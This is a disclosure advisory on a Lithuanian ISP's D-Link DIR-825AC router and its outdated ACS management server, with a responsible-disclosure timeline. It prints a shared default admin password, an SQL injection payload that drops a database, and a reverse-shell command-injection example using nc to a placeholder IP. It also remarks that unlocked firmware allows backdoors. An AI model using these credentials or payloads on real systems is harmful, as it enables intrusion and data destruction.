FDEU-CVE-2021-2F01

Summary

Vulnerable Cgates router and outdated ACS management server.

Tech details

Cgates provided D-Link DIR-825AC router has weak default admin password, weak factory wifi password and the outdated ACS server may contain SQL injection and remote code execution vulnerabilities.

About Cgates

Cgates is a private company in Lithuania that provides internet, IPTV and VoIP services. In 2021 it had 20-30 million eur turnover and average salary 1944 eur.

About Dlink router

Cgates provides a CPE internet router D-Link DIR-825AC to customers.

The official Cgates provided manual:

https://www.cgates.lt/userfiles/files/instrukcijos/marsrutizatorius-d-link-dir-825.pdf

It is an entry-level 5ghz gigabit router based on Realtek RTL8196D/RTL8367R SoC. Nothing spectacular. Users do not honor it much and tend to sell it after getting for free:

Cgates D-Link DIR-825AC on Skelbiu.lt

https://www.skelbiu.lt/skelbimai/d-link-ac1200-marsrutizatorius-51772539.html

Got an updated router from Cgates. Already have a better one so don't need it.
Can ship to any city. 25 €
Atsiuntė C-gates atsinaujinti. Turim geresnį, tai nereikia.
Galiu išsiųsti ir į kitą miestą. 25 €

Weak factory wifi password

As usually, the router comes with 8 digit-only default wifi password. Which makes it very easy to connect remotely, just in a few seconds.

Default admin password

Router's web UI is supposed to have default admin/admin credentials. But that didn't work. Some models may have telnet available, but the default credentials also don't work there.

All the Cgates routers shared the same custom admin password. And it was stored on the ACS server in some custom encrypted form.

The following link does not contain the actual config, but provided as an example of URL:

http://acsd.cgates.lt:8080/config/340804DD05BC/12_05_2012%2010_49_33/tmp/etc/default/config.json

It required some magic to guess the correct file name (hello Citybee), but at the end we got it:

 "passwd": [
  {
   "login_cr": "96f6e6cab3c87a5c5c419aa7208711f6",
   "pass_cr": "92f000a7fdc6857fddfb67912ae1f158"
  }

The encryption method could not be detected from the first sight. Had to dig into the firmware.

The firmware is available here: https://dlink.ru/ru/download2/5/19/2354/441/

Decryption tool

D-Link decided to create their own custom encryption. However, since the firmware is publicly available, anyone can reverse engineer the algorithm. The code can be found at:

Library: libdhal.so libaes-gpl.so
Function: int crypto_str(char *, char **, int);

A special decryption tool has been created:

$ ./decrypt.sh
User: admin
Pass: admi01

(The tool will be published later)

The default password admi01 worked on multiple devices, so we assume it is the same across all the Cgates routers. Successfully logged in on both web UI and telnet giving the full admin access to the web settings and full root access to the built-in Linux busybox:

Welcome to
     _______          ___     __  ____   _  _   ___
    |  ___  \        |   |   |__||    \ | || | /  /
    | |   | ||  ___  |   |__  __ |     \| || |/  /
    | |___| || |___| |      ||  || |\     ||     \
    |_______/        |______||__||_| \____||_|\___\

                     = Building Networks for People =

BusyBox v1.26.2 (2018-03-30 16:54:36 MSK) built-in shell (ash)

Web UI summary:

D-Link DIR-825AC summary page

Web UI OTA:

D-Link DIR-825AC OTA firmware update page

Firmware

The firmware seems to be made by D-Link subsidiary in Russian Federation. All timestamps used by compilers have MSK timezone. OTA updates are also pulled from fwupdate.dlink.ru.

The firmware is not locked, which means you can patch the original firmware and flash it (great opportunity for persistent backdoors!). After flashing the default firmware it loses all the Cgates branding.

Cgates ACS

As previously mentioned, D-Link provides its own CPE management software.

Cgates has it installed at this location:

http://acsd.cgates.lt:8080/

Cgates ACS server

HTML discloses some local server path:

<input type="hidden" id="apppath" data-apppath="/var/ACS/secureFiles/actions/api/../../"/>

Outdated ACS software

We couldn't find any useful information about the ACS software in English. All we could find was a press release by D-Link in Lithianian and the same text in Kazakh:

https://www.dlink.lt/lt/news/59/1503.html

https://www.dlink.ru/kz/news/1/1497.html

Even though it states "Open source", there was no source code released, but only some very old i386 binary code.

The package can be downloaded from:

ftp://ftp.dlink.ru/pub/Software/ACS_server/D-Link_ACS_server_distributive.rar

In the package we found english installation manual. The software is really outdated. It mentions Ubuntu 10.10 and uses obsolete security concepts, like:

chmod -R 777 apache-tomcat/*

and:

               
chmod 777 ACSProject
cd ACSProject
chmod –R 777 *

The main CPE management logic uses a binary executable called ACSServer. It contains custom network communication protocol and database connectivity. It talks directly to customers' routers.

SQL injection

ACSServer binary performs the database lookup with the router's provided serial number to see if the device belongs to the ISP network. The function is called:

int check_device_id(char *serialNumber);

At some point it builds an SQL statement to check the device:

sprintf(sel_dev_id_query, serialNumber);

And the query template looks like:

sel_dev_id_query = "SELECT `serial_number` FROM `device` WHERE serial_number = \"%s\"";

Since the serial number parameter is controlled by the user (attacker), it is possible to supply a specially crafted serial number that would cause an sql injection. For example:

serial_number = "aaa\"; DROP DATABASE ACS; ---"

RCE

One of the functions is used to send an email using this code:

  sprintf(cmd, "echo \"%s.\" | sendmail %s ", message, Email);
  system(cmd);

Email is not controlled by the attacker and seems to come from the server's config. But we couldn't quickly identify if the message parameter can be controlled. If it is, then an attacker can run arbitrary code on the server under the same acs user session, example:

message = "aaa\"; nc 1.2.3.4 1337 -e /bin/bash ; echo \"aaa"

Easter egg

Some strange string was found inside the MD5 digest authentication implementation:

iVar2 = find_string("qop", 0);
if (iVar2 == -1)
{
      serial = md5(HA2);
      __src = md5(HA1);
      sprintf(cpy_getParamValue, "%s:%s:%s", __src, "T.Sargsyan-S.Gharagyozyan", serial);
      puts("\n 3  ");
}

If you know who T.Sargsyan and S.Gharagyozyan are - share this article and spread the word.

Timeline

2020-11-01 - initial research started and some findings logged
2020-11-22 - Cgates made a press release about a "sophisticated cyber attack" against them
2020-11-23 - initial raw findings sent to Cgates to prevent possible risk
2020-12-28 - a reminder about the disclosure's deadline sent
2020-12-29 - got a reply from Cgates asking "who da heck you are and what do you want"
2020-12-29 - sent an explanation who the white hats were
2020-12-30 - got a PGP key from Cgates
2021-01-04 - sent a detailed report
2021-01-24 - got a confirmation from Cgates that all the items had been addressed
2021-02-22 - full disclosure